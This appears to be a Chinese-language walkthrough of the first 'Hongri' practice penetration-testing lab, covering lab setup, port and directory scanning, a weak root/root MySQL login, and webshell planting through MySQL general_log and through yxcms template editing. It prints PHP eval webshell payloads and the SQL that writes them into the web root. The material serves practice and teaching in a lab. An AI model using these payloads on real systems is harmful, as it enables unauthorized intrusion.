跳到主要内容

红日靶场(一)

部署

新建一个网卡,网段为192.168.52.0的,然后把三台机子都连到这个网段

image-20230923162445382

环境我是部署在的台式机上,攻击机是笔记本,所以我还把win7又接了一个网卡

image-20230923162745791

靶机ip信息

win7:192.168.10.40/192.168.52.143

win server 2003:192.168.52.141

win server 2008:192.168.52.1

遇到的问题

在win7里面启动phpstudy的时候会报错

Exception EReadError in module phpStudy.exe at 0002D806 Error reading CoolTraylcon1.Visible: Cannot create shell notification icon.

然后我把phpstudy的版本换成了2018的就好了

启动环境

win7启动phpstudy点击启动即可

image-20230923163149218

win server 2008启动redis

redis-server.exe redis.windows.conf

image-20230923163330770

外网

信息收集

扫端口和目录

端口扫描

nmap -sC -sV 192.168.10.40

image-20230923163907425

浏览器访问网站,是一个php study探针

image-20231012230930642

有一个mysql连接测试,输入root/root测试,连接成功

image-20231012231055411

然后又用dirsearch扫目录,看看有没有新发现,发现有phpmyadmin,那就可以用刚刚试出来的弱口令去登录后台

image-20231012231358593

利用mysql写日志getshell

发现有一个phpMyAdmin,用root/root弱口令成功登录

image-20230923170238861

先执行 select @@basedir;查看网站的物理路径

image-20231013104700595直接写文件到网站根目录下

语法:select '<?php @eval($_POST[shell]);?>' into outfile 'C:/phpStudy/www/shell.php';

但是报错了

image-20231013104958653

那就换个思路,利用mysql日志写文件

首先先查看日志状态,日志的状态和保存路径

show variables like '%general%';

image-20231013105210932

首先要开启 general_log,然后再修改日志保存的文件,即可通过保存日志的方式去写文件

SET GLOBAL general_log='on';
SET GLOBAL general_log_file='C:/phpStudy/www/shell.php'

image-20231013105806362

修改成功,然后就可以执行SQL语句,将一句话木马保存到 shell.php文件里了

select '<?php  @eval($_POST[shell]);?>'

蚁剑连接成功

image-20231013110045049

进去后发现还有一个cms网站和一个 beifen.rar文件

image-20231013110211794

CMS后台上传shell

下载 beifen.rar文件发现是cms的网站源代码,先放着,后续再看,访问yxcms网站,在公告处告诉了后台地址和默认管理员账号密码

image-20231013113421831

登陆后台,然后进入前台模板,然后点击管理模板文件,然后新建文件

image-20231013113518545

写入一句话木马 <?php @eval($_POST[hack]);?>

image-20231013113620253

然后根据备份文件,找到模板存放地址,在 /yxcms/protected/apps/default/view/default/

image-20231013114218367

蚁剑连接

image-20231013114353739

内网

是管理员权限了,同时耶发现了存在有域

image-20231013114522425